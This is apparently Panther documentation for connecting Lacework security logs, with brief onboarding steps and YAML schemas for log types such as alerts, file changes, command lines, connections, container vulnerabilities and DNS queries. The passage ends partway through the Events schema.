Lacework Logs
Connecting Lacework logs to your Panther Console
Panther supports ingesting Lacework logs via common Data Transport options: Amazon Web Services (AWS) S3 and SQS.
To connect these logs into Panther:
- 1.Log in to the Panther Console.
- 2.In the left sidebar, click Configure > Log Sources.
- 3.Click Create New.
- 4.Search for the log type you want to onboard, then click its tile.
- 5.Select the data transport method you wish to use for this integration, then follow Panther's instructions for configuring the method:
- 6.Configure Lacework to push logs to the Data Transport source.
- See Lacework's documentation for instructions on pushing logs to your selected Data Transport source.
Required fields in the schema are listed as "required: true" just below the "name" field.
Lacework.AgentManagement gathers Lacework agent management information.
fields:
- name: AGENT_VERSION
required: true
type: string
- name: CREATED_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: HOSTNAME
required: true
type: string
- name: IP_ADDR
required: true
type: string
indicators:
- ip
- name: LAST_UPDATE
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
- name: MID
required: true
type: bigint
- name: MODE
required: true
type: string
- name: OS
required: true
type: string
- name: STATUS
required: true
type: string
- name: TAGS
type: json
Lacework.AlertDetails provides information about generated alerts.
fields:
- name: END_TIME
required: true
type: timestamp
timeFormats:
- '%a, %d %b %Y %H:%M:%S %z'
- '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: ENTITY_MAP
required: true
type: object
fields:
- name: NewViolation
type: array
element:
type: object
fields:
- name: KEY
type: object
fields:
- name: reason
type: string
- name: reason_id
type: string
- name: rec_id
type: string
- name: resource
type: string
indicators:
- aws_arn
- name: PROPS
type: json
- name: RecId
type: array
element:
type: object
fields:
- name: KEY
type: object
fields:
- name: eval_guid
type: string
- name: rec_id
type: string
- name: PROPS
type: json
- name: Resource
type: array
element:
type: object
fields:
- name: KEY
type: object
fields:
- name: name
type: string
- name: value
type: string
indicators:
- aws_arn
- name: ViolationReason
type: array
element:
type: object
fields:
- name: KEY
type: object
fields:
- name: reason
type: string
- name: reason_id
type: string
- name: rec_id
type: string
- name: PROPS
type: json
- name: EVENT_ACTOR
required: true
type: string
- name: EVENT_ID
required: true
type: bigint
- name: EVENT_MODEL
required: true
type: string
- name: EVENT_TYPE
required: true
type: string
- name: START_TIME
required: true
type: timestamp
timeFormats:
- '%a, %d %b %Y %H:%M:%S %z'
- '%Y-%m-%d %H:%M:%S.%f'
Lacework.AllFiles tracks every time Lacework detects a file.
fields:
- name: CREATED_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: FILEDATA_HASH
required: true
type: string
indicators:
- sha256
- name: FILE_PATH
required: true
type: string
- name: MID
required: true
type: bigint
- name: MTIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
- name: SIZE
required: true
type: bigint
Lacework.Applications contains applications information running on the machine with an agent installed with details (such as application name, user name, machine, etc.).
fields:
- name: APP_NAME
required: true
description: The application name detected by the Lacework agent installed on the machine.
type: string
- name: CONTAINER_INFO
description: The container info provides details about the container where the application is running.
type: json
- name: END_TIME
required: true
description: The time and date when the hourly aggregation time period ends.
type: timestamp
timeFormats:
- '%a, %d %b %Y %H:%M:%S %z'
- '%Y-%m-%d %H:%M:%S.%f'
- name: EXE_PATH
required: true
description: The executable path for the detected application.
type: string
- name: MID
description: The Lacework-generated machine identifier that uniquely identifies the machine.
type: bigint
- name: NET_STATS
description: The network stats about the application including the number of bytes in and out of the network.
type: json
- name: PROPS_MACHINE
description: The machine properties such as host name, ip address, machine tags, etc.
type: object
fields:
- name: hostname
description: hostname
type: string
indicators:
- hostname
- name: ip_addr
description: ip_addr
type: string
indicators:
- ip
- name: mem_kbytes
description: mem_kbytes
type: bigint
- name: num_users
description: num_users
type: bigint
- name: primary_tags
description: primary_tags
type: json
- name: tags
description: tags
type: json
- name: up_time
description: up_time
type: bigint
- name: START_TIME
required: true
description: The time and date when the hourly aggregation time period starts.
type: timestamp
timeFormats:
- '%a, %d %b %Y %H:%M:%S %z'
- '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: USERNAME
description: The username running the application on the machine.
type: object
fields:
- name: effective
description: effective
type: string
indicators:
- username
- name: original
description: original
type: string
indicators:
- username
Lacework.ChangeFiles tracks every time a file is changed in your environment.
fields:
- name: END_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: FILEDATA_HASH
required: true
type: string
indicators:
- sha256
- name: FILE_PATH
required: true
type: string
- name: MID
required: true
type: bigint
- name: MTIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
- name: SIZE
required: true
type: bigint
- name: START_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
Lacework.CloudCompliance tracks compliance violations identified by Lacework cloud assessments.
fields:
- name: REASON
type: string
- name: REGION
type: string
- name: RESOURCE
type: string
indicators:
- aws_arn
- name: ACCOUNT
required: true
type: object
fields:
- name: AccountId
type: string
indicators:
- aws_account_id
- name: Account_Alias
type: string
- name: EVAL_TYPE
required: true
type: string
- name: ID
required: true
type: string
- name: RECOMMENDATION
type: string
- name: REPORT_TIME
required: true
type: timestamp
timeFormats:
- '%Y-%m-%d %H:%M:%S.%f'
- '%a, %d %b %Y %H:%M:%S %z'
isEventTime: true
- name: SECTION
type: string
- name: SEVERITY
required: true
type: string
- name: STATUS
required: true
type: string
Lacework.CloudConfiguration contains details about supported and configured cloud resources.
fields:
- name: START_TIME
required: true
description: The time and date when the hourly aggregation time period starts.
type: timestamp
timeFormats:
- '%a, %d %b %Y %H:%M:%S %z'
- '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: END_TIME
required: true
description: The time and date when the hourly aggregation time period ends.
type: timestamp
timeFormats:
- '%a, %d %b %Y %H:%M:%S %z'
- '%Y-%m-%d %H:%M:%S.%f'
- name: URN
required: true
description: URN of the resource.
type: string
indicators:
- aws_arn
- name: SERVICE
description: The service that the resource belongs to.
type: string
- name: STATUS
description: The status of the resource.
type: json
- name: CLOUD_DETAILS
description: Cloud details.
type: json
- name: RESOURCE_TYPE
description: The resource type.
type: string
- name: RESOURCE_ID
required: true
description: The ID of the resource.
type: string
- name: RESOURCE_REGION
description: The region that the resource belongs to.
type: string
- name: RESOURCE_CONFIG
description: The configuration of the resource.
type: json
- name: RESOURCE_TAGS
description: The tags associated with the resource.
type: json
- name: CSP
description: The cloud provider.
type: string
- name: API_KEY
description: The key describing the API used to fetch data for the resource.
type: string
Lacework.Cmdline monitors any command line invocations in your environment.
fields:
- name: CMDLINE
required: true
type: string
- name: CMDLINE_HASH
required: true
type: string
indicators:
- md5
- name: CREATED_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
Lacework.Connections monitors for connections in your environment.
fields:
- name: DST_ENTITY_ID
required: true
type: object
fields:
- name: pid_hash
type: string
- name: port
type: bigint
- name: protocol
type: string
- name: mid
type: bigint
- name: DST_ENTITY_TYPE
required: true
type: string
- name: DST_IN_BYTES
required: true
type: bigint
- name: DST_OUT_BYTES
required: true
type: bigint
- name: ENDPOINT_DETAILS
required: true
type: array
element:
type: object
fields:
- name: dst_ip_addr
required: true
type: string
indicators:
- ip
- name: dst_port
required: true
type: bigint
- name: protocol
required: true
type: string
- name: src_ip_addr
required: true
type: string
indicators:
- ip
- name: END_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: NUM_CONNS
required: true
type: bigint
- name: SRC_ENTITY_ID
required: true
type: object
fields:
- name: mid
required: true
type: bigint
- name: pid_hash
required: true
type: string
- name: SRC_ENTITY_TYPE
required: true
type: string
- name: SRC_IN_BYTES
required: true
type: bigint
- name: SRC_OUT_BYTES
required: true
type: bigint
- name: START_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
Lacework.ContainerSummary monitors for containers in your environment.
fields:
- name: POD_NAME
type: string
- name: CONTAINER_NAME
required: true
type: string
- name: END_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: IMAGE_ID
required: true
type: string
- name: MID
required: true
type: bigint
- name: PROPS_CONTAINER
required: true
type: object
fields:
- name: VOLUME_MAP
type: json
- name: POD_IP_ADDR
type: string
indicators:
- ip
- name: LISTEN_PORT_MAP
type: json
- name: POD_TYPE
type: string
- name: PROPS_LABEL
type: json
- name: CONTAINER_START_TIME
required: true
type: timestamp
timeFormat: unix_ms
- name: CONTAINER_TYPE
required: true
type: string
- name: IMAGE_AUTHOR
required: true
type: string
- name: IMAGE_CREATED_TIME
required: true
type: timestamp
timeFormat: unix_ms
- name: IMAGE_ID
required: true
type: string
- name: IMAGE_PARENT_ID
required: true
type: string
- name: IMAGE_REPO
required: true
type: string
- name: IMAGE_SIZE
required: true
type: bigint
- name: IMAGE_TAG
required: true
type: string
- name: IMAGE_VERSION
required: true
type: string
- name: IMAGE_VIRTUAL_SIZE
required: true
type: bigint
- name: IPV4
required: true
type: string
indicators:
- ip
- name: NAME
required: true
type: string
- name: NETWORK_MODE
required: true
type: string
- name: PID_MODE
required: true
type: string
- name: PRIVILEGED
required: true
type: bigint
- name: START_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
- name: TAGS
required: true
type: json
Lacework.ContainerVulnDetails monitors for container vulnerabilities in your environment.
fields:
- name: SEVERITY
type: string
- name: VULN_ID
type: string
- name: EVAL_CTX
required: true
type: object
fields:
- name: cve_batch_info
required: true
type: array
element:
type: object
fields:
- name: cve_batch_id
required: true
type: string
- name: cve_created_time
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f000'
- name: image_info
required: true
type: object
fields:
- name: created_time
required: true
type: timestamp
timeFormat: unix_ms
- name: digest
required: true
type: string
- name: id
required: true
type: string
- name: registry
required: true
type: string
- name: repo
required: true
type: string
- name: scan_created_time
required: true
type: timestamp
timeFormat: unix
- name: size
required: true
type: bigint
- name: status
required: true
type: string
- name: tags
required: true
type: array
element:
type: string
- name: type
required: true
type: string
- name: integration_props
required: true
type: object
fields:
- name: INTG_GUID
type: string
- name: NAME
type: string
- name: REGISTRY_TYPE
type: string
- name: is_reeval
required: true
type: boolean
- name: request_source
required: true
type: string
- name: scan_batch_id
required: true
type: string
- name: scan_request_props
required: true
type: object
fields:
- name: reqId
type: string
- name: data_format_version
required: true
type: string
- name: props
required: true
type: object
fields:
- name: data_format_version
required: true
type: string
- name: scanner_version
required: true
type: string
- name: scanCompletionUtcTime
required: true
type: timestamp
timeFormat: unix
- name: scan_start_time
required: true
type: timestamp
timeFormat: unix
- name: scanner_version
required: true
type: string
- name: vuln_batch_id
required: true
type: string
- name: vuln_created_time
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f000'
- name: FEATURE_KEY
required: true
type: object
fields:
- name: name
required: true
type: string
- name: namespace
required: true
type: string
- name: version
required: true
type: string
- name: FEATURE_PROPS
required: true
type: object
fields:
- name: introduced_in
required: true
type: string
- name: layer
required: true
type: string
- name: src
required: true
type: string
- name: version_format
required: true
type: string
- name: FIX_INFO
required: true
type: object
fields:
- name: compare_result
required: true
type: string
- name: fix_available
required: true
type: string
- name: fixed_version
required: true
type: string
- name: IMAGE_ID
required: true
type: string
- name: START_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: STATUS
required: true
type: string
Lacework.DNSQuery monitors for any DNS queries in your environment.
fields:
- name: CREATED_TIME
required: true
type: timestamp
timeFormat: '%Y-%m-%d %H:%M:%S.%f'
isEventTime: true
- name: DNS_SERVER_IP
required: true
type: string
indicators:
- ip
- name: FQDN
required: true
type: string
indicators:
- domain
- name: HOST_IP_ADDR
required: true
type: string
indicators:
- ip
- name: MID
required: true
type: bigint
- name: TTL
required: true
type: bigint
Lacework.Events represents the content of an exported Lacework Alert S3 Object.
- name: EVENT_CATEGORY
required: true
description: The category the event falls into
type: string
- name: EVENT_DETAILS
required: true
description: The event details
type: object
fields:
- name: data
description: The array of event data
type: array
element:
type: object
fields:
- name: START_TIME
description: The event start time.
type: timestamp
timeFormat: rfc3339
- name: END_TIME
description: The event end time.
type: timestamp
timeFormat: rfc3339
- name: EVENT_TYPE
description: The event type description eg - launched new binary.
type: string
- name: EVENT_ID
description: The event alert ID.
type: string
- name: EVENT_ACTOR
description: The origin of the event eg - AWS, User.
type: string
- name: EVENT_MODEL
description: The model that triggered an alert.
type: string
- name: ENTITY_MAP
description: The map of related fields to the detection alert.
type: object
fields:
- name: User
description: Any user based info involved in an alert.
type: array
element:
type: object
fields:
- name: MACHINE_HOSTNAME
description: Hostname field
type: string
- name: USERNAME
description: Username field
type: string
indicators:
- username
- name: Application
description: